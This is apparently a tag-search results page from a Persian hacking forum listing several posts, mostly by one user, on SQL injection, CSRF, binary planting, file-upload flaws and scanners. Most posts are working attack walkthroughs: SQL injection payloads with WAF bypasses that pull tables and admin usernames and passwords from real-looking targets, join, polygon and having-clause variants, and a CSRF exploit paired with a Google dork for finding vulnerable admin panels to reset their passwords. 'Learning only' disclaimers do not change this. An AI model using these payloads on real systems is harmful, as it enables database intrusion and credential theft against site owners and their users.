جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'باگ'.
29 نتیجه پیدا شد
-
sql injection آموزش آسیب پذیری Sql Injection (ویدئویی)
MR.MSA پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : [Hidden Content] چند نکته مهم : لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .- 45 پاسخ
-
- sql injection vulnerability
- اموزش ویدئویی
-
(و 55 مورد دیگر)
برچسب زده شده با :
- sql injection vulnerability
- اموزش ویدئویی
- vulnerability
- site hacking
- اموزش وب هکینگ
- sql injection method
- sql injection bypass
- sql injection ویدئویی
- sqli attack
- باگ بانتی
- هک
- تارگت های تمرینی
- video
- mysql
- polygon
- دیتابیس هکینگ
- وب هکینگ
- database attack
- سرور هکینگ
- هکر
- bug bounty
- باگ
- تارگت
- sqli
- bug
- web hacking
- bug crowd
- waf
- تزریق sql
- database hacking
- آموزش ویدئویی
- sql
- hack
- mr.msa
- bypass
- firewall
- mssql
- like
- cdn
- waf bypassing
- web application firewall
- cloudflare
- اموزش تست و نفوذ
- تارگت sql injection (تست و نفوذ ویدئویی )
- اسیب پذیری های تحت وب
- اسیب پذیری
- اسیب پذیری های سایت
- join
- اموزش هک
- اسیب پذیری sql injection
- اموزش به صورت ویدئویی
- sqli vulnerability
- website vulnerability
- اموزش هک سایت
- اموزش هک سایت با sqli
- اموزش دسترسی به دیتابیس
- اموزش برداشتن دیتابیس یک سایت
-
RFU.mp4
-
- rfu
- تست و نفوذ
- (و 11 مورد دیگر)
-
msa service خدمات MR.MSA | ورژن 1.8 | ورژن 2 به زودی
MR.MSA پاسخی ارسال کرد برای یک موضوع در تارگت های تمرینی
MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش : R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz ورژن 1.4.0 رونمایی می کند : mr-msa.xyz ورژن 1.5.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .- 8 پاسخ
-
- msacms tools
- بلودیت
-
(و 79 مورد دیگر)
برچسب زده شده با :
- msacms tools
- بلودیت
- wordpress xss
- wordpress 5.5
- cms security
- ssrf
- bug privet
- تایپو ۳
- mr-msa.xyz
- جوملا
- rfi
- sql injection
- وردپرس
- sqli
- typo3 cms
- bug crowd
- bug bounty
- csrf
- تمرین تست نفوذ و یادگیری cms ها
- wordpress
- joomla
- msacms
- آزمایشگاه تحلیل باگ
- cms
- shell
- آزمایشگاه تست نفوذ
- uploader
- آموزش cms
- web application bug
- madesimple
- bug
- bludit
- cms typo3
- باگ
- lfi rfi
- webapplication hacking
- rfu
- bludit cms
- msacms+
- concrete5
- cms bludit
- cmsmadesimple
- sql injention
- تست امنیت
- waf
- upload
- upload shell
- wordpress them
- database mysql
- firewall
- باگ پرایوت و مکان ازمایشگاهی با msacms | ورژن 1.5.0
- آزمایشگاه
- .xyz
- سیستم مدیریت محتوا
- wordpress 5.5.3
- mr-msa
- hack
- waf bypassing
- امنیت
- typo3
- program
- php
- tools
- web security
- دروپال
- rce
- web application firwall
- اموزش
- web application security
- lfi
- mr.msa
- xss
- drupal
- .cf
- wordpress 5.6
- security
- web design
- web developer
- html
- css
- js
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران در این تاپیک قصد دارم تارگت با نکات خاص رو خدمتتون آموزش بدم ولی قبلش باید یادآوری کنم که این آموزش ها فقط برای آشنایی و یادگیری شماست هر گونه استفاده ی غیرمجاز به عهده ی خود شماست ! در ضمن دوستان عزیزی که به ضمینه ی هک و امنیت علاقه مند هستند میتوانند این آموزش هارو دنبال کنند و با مراجعه به تاپیک های قبلی بنده میتونید این آموزش رو از اول یاد بگیرید چون در اینجا فقط به نکات اشاره خواهد شد نکته : هک ر شدن بچه بازی نیست که بخوای برای آسیب رسوندن به دیگران یا تفریح یادبگیری اگر اهدافت برای یادگیری هک اینه همین الان میتونی اینجارو ترک کنی تارگت : [Hidden Content] با قرار دادن ' آسیب پذیری مشخص خواهد شد [Hidden Content]' حال به سراغ دستورات بعدی برای پیدا کردن ستون های سایت میرویم با استفاده از دستور [Hidden Content] order by 99999-- بسیار خب میبینیم که به کلمه ی order حساس هستش پس بایپس کلمه ی order رو قرار میدیم -> group [Hidden Content] group by 99999-- صفحه load میشود در صورتی که نباید load َود چون هیچ سایتی انقدر ستون ندارد پس بایپسشو قرار میدیم [Hidden Content]' group by 99999--+ انقدر اعداد رو کم میکنیم تا صفحه load شود به 25 خواهیم رسید بدین صورت [Hidden Content]' group by 25--+ حال باید دستورات بعدی برای بیرون کشیدن database اعمال کنیم برای راحتی کارشما که شاید برنامه Hackbar روی مرورگرتون نصب نباشه لیست اعداد رو تهیه کردم که بتونید راحت جای گذاری کنید union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 خب دستورات رو وارد میکنیم بدین شکل [Hidden Content]' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ ولی با یک Error معروف رو به رو خواهیم شد پس با دستور /*!00000union*/ بایپس میکنیم [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ خب حالا میریم سراغ بیرون کشیدن table های سایت [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,group_concat(table_name,0x3c62723e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+ میبینیم که دوباره با Error معروف Not Acceptable! مواجه خواهیم شد خیلی راحت با دستوراتی که خدمتتون عرض کردم بایپس کنید بدین شکل [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(table_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.tables*/+/*!00000where*/+table_schema=database()--+ سایتی رو معرفی میکنم که برای hex کردن متن کمکتون میکنه Text To Hex بسیار خب میریم سراغ دستورات بعدی شروع به hex کردن admin_log میکنیم و در دستور قرار میدیم (اگر با دستورات آشنا نیستی موضوعات قبلی تاپیک های بنده رو ببین ) [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(column_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.columns*/+/*!00000where*/+table_name=0x61646d696e5f6c6f67--+ و دستور بعد برای استخراج داده [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(uid,0x3a,upass,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+admin_log--+ دوستان عزیز لطفا از آموزش ها سو استفاده نکنید این آموزش ها فقط برای یادگیری شماست پس لطفا کسی رو دیفیس نکنید سعی میکنم هر روز یک تاپیک در مورد تارگت با نکات خاص قرار بدم لطفا در اینجا اسپم نکنید برای ادامه ی آموزش ها فقط تاپیک را بپسندید موفق باشید admin11:admin11 username & password
- 2 پاسخ
-
- sqlinjectin bypass
- دیفیس
- (و 17 مورد دیگر)
-
با سلام خدمت کاربران و مدیران عزیز گارد ایران در این پست قصد دارم به شما نحوه پچ باگ RFU بدم . RFU : Remote File Upload یک توضیح مختصر : هنگام اپلود یک فایل در سرور این اسیب پذیری به وجود می اید که هکر فایل مخرب خودش رو در سرور آپلود می کند (shell) به صورت کلی این اسیب پذیری بسیار خطر ناک است و باعث می شود که هکر دسترسی کامل به سایت بگیرد ولی حالت های دیگری هم وجود دارد که خطر این باگ کمتر می شود مثلا هکر نمی تواند فایل php خودش که شل است رو آپلود کنه به جای آن فایل html خودش که دیفیس پیج است رو آپلود می کنه یه کمی توضیح طولانی شد خب حالا میریم سراغ جلو گیری از باگ RFU در کد نویسی اولین قدم باید فایل ها در یک جای مشخص و خاص باشد می توانید از این دستور استفاده کنید : move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); الان فایل های اپلودی در فولدری به نام Guardiran قرار می گیرند . حالا برای اینکه فایل های php قابل آپلود نباشند : if(end(explode('.',$_FILES['upload']['name'])) !== 'php'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } تا الان آپلودر ما کمی وضعیتش بهتر شده بعضی از سایت ها از این فیلترینگ استفاده می کنند ولی امنیت بسیار پایینی دارد چون زبان php به حروف بزرگ و کوچک حساس است یعنی ما گفتیم با در آخر نام ... php نباشد اما برای مثال هکر با این نام اپلود می کند b374k.PHP که هر دو فرمت php هستند اما از نظر حروف کوچک و بزرگ باهم فرق دارند پس کد های خودمون رو تغییر می دهیم . به این صورت : if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } الان یک اپلودر با امنیت خوب داریم ولی هنوز با بایپس ها و متد و... امکان دور زدن وجود دارد پس امنیت رو بالا تر می بریم تا کار هکر سخت تر شود . کاری می کنیم که هکر به راحتی فایل خودش رو پیدا نکنه و از تابع rand استفاده می کنیم و کد ها رو به این صورت می نویسیم : if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ $ch = rand(); move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$ch}.jpg"); }else{ } می توانید بعد از else (در غیر این صورت ) خطای خود را با html و css طراحی کنید . چند راه پیشنهادی جهت رفع بهتر باگ RFU : بهتر است که از یک سرور اختصاصی استفاده کنید و فایل های اپلودی خودتون رو در یک سرور دیگر آپلود کنید . دایرکتوری فایل های اپلود با دایرکتری فایل های اصلی متفاوت باشد . امیدوارم از این پست لذت برده باشید . Download Uploader.zip
-
با سلام خدمت کاربران و مدیران عزیز گارد ایران توضیح مختصر در رابطه با جداول (table) تیبل های سیستمی : تیبل هایی که بیشتر مواقع با حروف بزرگ هستند و زیاد به کار ما نمیان . تیبل های user یا کاربری : تیبل هایی که ما با آنها کار داریم و بیشتر مواقع با حروف کوچک هستند . ما قبلا برای محدود سازی از این روش استفاده می کردیم : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+table_schema=database()-- و حالا در محدود سازی که می خواهم به شما آموزش دهم url به این طریق می شود : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),1,1))>97-- و دارید می گویید که تمام تیبل هایی را که حرف های شان از عدد 97 (a) بیشتر است نمایش بده که اعداد بیشتر از 97 در کدگذاری ascii حروف کوچک هستند. برای اینکه بگویید تیبل هایی که حرف دوم آن ها کوچک است را برسی کند : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),2,1))>97-- نکته : در این روش از کدگذاری ascii استفاده شده که عدد 97 به معنای a کوچک است . امیدوارم لذت برده باشید تشکر فراموش نشه 😅
-
- sql injection
- bug
-
(و 13 مورد دیگر)
برچسب زده شده با :
-
بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . 💙 فراموش نشه 😍
-
- sql injection
- sqli
-
(و 20 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت دوستان عزیز گارد ایران من MR.MSA در این تاپیک قصد دارم یک اکسپلویت در باگ CSRF رو به شما معرفی کنم و کمی توضیح درباره این باگ برای مبتدی ها ، با من همراه باشید . -------------------- CSRF : Cross Site Request Forgery نکات باگ : معنی شده آن جعل درخواست است . این باگ را کرم تحت وب می شناسند و اثر بدی دارد . این باگ توسط سایت و فایروال شناسایی نمی شود . -------------------- نحوه حمله : این حمله به طوری است که ما با استفاده از جعل کوکی admin سایت می توانیم درخواست های جعلی بدهیم . -------------------- انجام حمله : قدم اول : گوگل دورک Google Dork : inurl:admin/admin.php Travel PORTAL ---------- قدم دوم : اکسپلویت به این ادرس بروید و اکسپلویت رو با پسوند html ذخیره کنید . exploit : [Hidden Content] ---------- قدم سوم : به جای [Hidden Content] آدرس سایت خود را بزنید => [Hidden Content] قدم چهارم : رمز جدید خود را بزنید . ----------------------------- امید وارم از این تاپیک لذت برده باشید و اکسپلویت مورد تایید شما قرار گرفته باشه . اگه مشکلی داشت به خوبی خودتون ببخشید سعی کردم تاپیک رو جوری بنویسم که همه بتوانند استفاده کنند . ******************** MR.MSA ***************** <------------------------MR.MSA----------------------> -------- پیج فیک ------- <صفحه لاگین اینستاگرام (فیک)> ------- باگ -------- <آموزش متد polygon در sql injection > <آموزش متد join در sql injection > <نکته مهم در متد join > ------- افزونه -------- <افزونه Wapplyzer (اسکنر سایت ) > <افزونه اسکن سایت های wordpress> <افزونه whatruns (جمع آوری اطلاعات سایت)> <------------------------MR.MSA----------------------/>
-
با سلام همانطور که در آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ پس شما باید از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . ------------------------------ برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
-
- method
- method sql injection
-
(و 27 مورد دیگر)
برچسب زده شده با :
- method
- method sql injection
- sql
- sql injection
- bug
- web hacking
- site
- bypass
- bypass sql injection
- bypass sql
- نکته مهم در متد join
- متد join در sql injection
- mr.msa
- هک
- هک سایت
- وب هکینگ
- باگ
- بایپس
- بایپس sql injecion
- متد
- متد sql injection
- متد join
- دیتابیس هکینگ
- دیتابیس
- دیتابیس mysql
- mysql
- database hacking
- database mysql
- database attack
-
با سلام خدمت کاربران و مدیران انجمن گارد ایران من MR.MSA در این پست قصد دارم متد polygon رو به شما آموزش بدهم . ------------------------------------ یکی از کاربرد های متد polygon زمانی است که : در یک تارگت order+by و ... را زدید و تعداد تیبل ها را بدست اوردید و بعد خواستید تیبل ها را بیرون بکشید و با خطای error different number of columns مواجه شدید می توانید از متد polygon استفاده کنید . یکی دیگر از کاربرد های متد polygon زمانی است که : با خطای Unknown column “language’ in ‘field list’ مواجه می شوید می توانید از متد polygon استفاده کنید . ------------------------------------ سطح متد : حرفه ای ------------------------------------ روش استفاده از متد polygon : ابتدا مقدار را پاک کنید : site.com/news.php?id=1 ( نکته : در سایت های که مثلا دو مقدار است آن مقدار را پاک می کنید که اسیب پذیر است و بعد مراحل را پیش می روید . ) -------------- سپس این عبارت را قرار می دهید : [Hidden Content]((select*from(select*from(select@@version)f)x)) و اگر ورژن را به شما نمایش داد یعنی می توانید از متد polygon استفاده کنید . یک جورایی میشه گفت جای که version است ستون آسیب پذیره. -------------- خب حالا می رویم سراغ بیرون کشیدن تیبل ها : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(table_name) from information_schema.tables where table_schema=database())f)x)) قسمت های بنفش قسمت هایی هستند که تازه اضافه شده اند . توجه داشته باشید که به دلایلی دو (( آخر دستور در جاهای دیگر قرار گرفته اند اما در نگاه به این شکل است ولی زمانی که شما این دستور را کپی کنید و به url تارگت اضافه کنید درست نمایش داده می شود . ( در تمامی دستورات به همین شکل است ، پس نگران نباشید 😁) -------------- (برای مثال تیبل مهمی که بدست می آوریم user است ) و حالا برای بیرون کشیدن ستون های یک جدول : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(column_name)+from+information_schema.columns+where+table_name=’user’)f)x)) قسمت های بنفش قسمت های جدید هستند و باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . -------------- و می مونه بیرون کشیدن اطلاعات ستون های مهم : site.com.news.php/id=polygon((select*from(select*from(select@@group_concat(user,0x3a,pass) from ‘user’)f)x)) باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) و به جای user و pass نام ستون مهم خود را بنویسید . اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . ------------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد polygon یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم . هر گونه سوال در مورد پست داشتید در قسمت سوال و جواب بپرسید .
-
- دیتابیس
- method sql injection
-
(و 26 مورد دیگر)
برچسب زده شده با :
- دیتابیس
- method sql injection
- method
- آموزش
- bug
- وب هکینگ
- هک سایت
- باگ
- database hacking
- database
- web hacking
- sql injection
- sql
- bypass sql injection
- bypass sql
- bypass
- mr.msa
- متد sql injection
- متد
- بایپس sql
- بایپس sql injecion
- بایپس
- آموزش متد polygon در sql injection
- متد polygon
- mysql
- دیتابیس mysql
- دیتابیس هکینگ
- متد های حرفه ای
-
با سلام خدمت شما کاربران عزیز انجمن گارد ایران در این پست می خواهم متد join رو در باگ sql injection به شما آموزش بدهم . ------------------------ موارد قابل استفاده : ۱- مواجه شدن با خطا زمان استفاده از union select ۲- مواجه شدن با خطای : 'Unknown column ‘activo’ in ‘field list ۳- زمانی که سایت به عدد حساس است . ۴- و.... ------------------------ نکته : در بیشتر سایت هایی که از متد join استفاده می شود سایت به + و یا به فاصله حساس است و شما به جای فاصله باید از /**/ استفاده کنید که من برای راحتی شما عزیزان فایلی را قرار دادم که در متد join به جای فاصله ها از /**/ استفاده شده . ------------------------ نحوه استفاده از متد join : ---------------------------------------- ( برای مثال تعداد تیبل های سایت ۵ تا می باشد. ) مرحله اول بیرون کشیدن ستون آسیب پذیر : +union+select+*from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e%23+ و همینطور تا اخر یعنی a و b و c باید کنار ( مقدار select ) قرار داشته باشند و مثلا ۱ می شود a و ۲ می شود b و به همین صورت و بین هر کدام یک join زمانی که به اخر رسدید دیگه join نمی خواهد و اینکه در اول باید بنویسید : from * توجه داشته باشید که هر عدد تبدیل شده است به یک سلکت (مقدار عدد ) ، یک حرف و join ---------------------------------------- ( برای مثال در خروجی ستون ۲ را نشان می دهد و ستون ۲ آسیب پذیر است. ) مرحله دوم بدست آوردن ورژن : +union+select+*from (select 1)a+join+(select version())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ---------------------------------------- مرحله سوم بیرون کشیدن جدول (table) های دیتابیس (و محدود سازی تیبل ها برای نشان ندادن تیبل های سیستمی ) : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ توجه داشته باشید در بیشتر سایت ها سایت به , حساس است به همین دلیل ما از متد separator برای مرتب سازی تیبل ها و تگ <br> استفاده کردیم و شما در صورت لزوم می توانید آن بخش هایی که بکگراند سفید دارند را حذف کنید . ---------------------------------------- ( برای مثال در بین تیبل ها تیبل msa_users وجود دارد . ) مرحله چهارم بیرون کشیدن ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name+like+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و می توانید برای مرتب سازی ستون ها از متد separator مانند مرحله سوم استفاده کنید . ما از متد like هم استفاده کردیم و اینکه توجه داشته باشید که بیشتر مراحل مثل یونیم بیس هست . ---------------------------------------- ( برای مثال در خروجی ستون های user و pass مهم است . ) مرحله پنجم بیرون کشیدن اطلاعات در ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(user using ascii)+from+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و به جای user نام ستون مهم خود را بنویسید. می توانید برای مرتب سازی یوزرنیم ها از متد separator مانند مرحله سوم استفاده کنید. و اینکه این یک بار برای یوزرنیم بود و برای پسورد به جای user می نویسید pass ( نام ستون مهم که مربوط به pass است ) ---------------------------------------- امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد join یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم منتظر کامنت های شما هستم . هر گونه سوال در مورد پست داشتید بپرسید . ********* MR.MSA ********** Join method in sql injection.txt
-
- method
- method sql injection
- (و 19 مورد دیگر)
-
خب سلام و درود ECHZED هستم ومدم شما رو با حملات binary planting آشنا کنم خلاصه این حمله اینه که ما توی یه دایرکتوری توی سیستممون بهش محدودیت خاصی ندادیم و آزاده الان هر کس دیگه ای لوگ این کنه توی سیستم ما با هر یوزری دسترسی نغییر توی اون دایرکتوری رو داره هکر با یک یوزر سطح پایین تر لوگ این میکنه ولی به اون دایرکتوری دسترسی داره حالا هکر کاری که میکنه اینه که میاد فایل مخربشو با فایلی که ما قراره اجرا کنیم عوض میکنه مثلا ما یه نرم افزار داریم به نام xy که هر روز اونو اجرا میکنیم حالا هکر میاد xy مارو پاک میکنه و فایل مخربشو با اسم xy اونجا میزاره حالا ما که با یوزر ادمین لوگ این میکنیم و اون فایل اجرا میشه هکر دسترسی کامل به سیستم ما میگیره این کلیت ماجرا بود ولی بیایم به منطق نزدیک تر بشیم مثلا فایل z یه dll داره به اسم z.dll هکر میدونه هر وقت ما برنامه ی z رو اجرا کنیم همراه باهاش z.dll هم اجرا میشه پس میاد z.dll اصلی رو پاک میکنه و فایل dll مخرب خودشو با همون اسم اونجا میزاره و هر وقت که یوزر ادمین برنامه ی z رو باز میکنه فایل مخرب z.dll هم باهاش اجرا میشه و به هکر دسترسی مورد نیازو میده ممنون که خونید کامل تر نیاز داتشید میتونید از لینک OWASP استفاده کنید OWASP
-
کار با اسکنر rapidscan
mr_locker پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
به نام آفریننده هستی MR.locker هستم با آموزشی دیگه در خدمت شمام امروز میخوام آموزش کار با اسکنر rapidscan رو یاد بدم. قبل هر چیز توضیحی بدم درباره این اسکنر این اسکنر بسیار اسکنر قدرتمندیه به این دلیل که کار این اسکنر به این صورته که از دیگر اسکنر های قدرتمند برای جست و جوی باگ استفاده میکنه و به جرعت میتونم بگم که خیلی قدرتمنده و فقط تنها ایرادی که داره سرعت نصبتا پایینشه ولی به چشم نمیاد. اول از همه از گیتهاب کلونش میکنیم با دستور [Hidden Content] و بعد از کلون شدن با زدن دستور cd rapidscan وارد پوشه ابزار میشیم پس از وارد شدن به پوشه ابزار دستور python rapidscan.py رو میزنیم و جلوی اون سایتی که میخواییم اسکن شه رو میزاریم مثل python rapidscan.py target.com تا آموزش بعدی یا حق-
- اسکنر
- آسیب پذیزی
-
(و 3 مورد دیگر)
برچسب زده شده با :
-
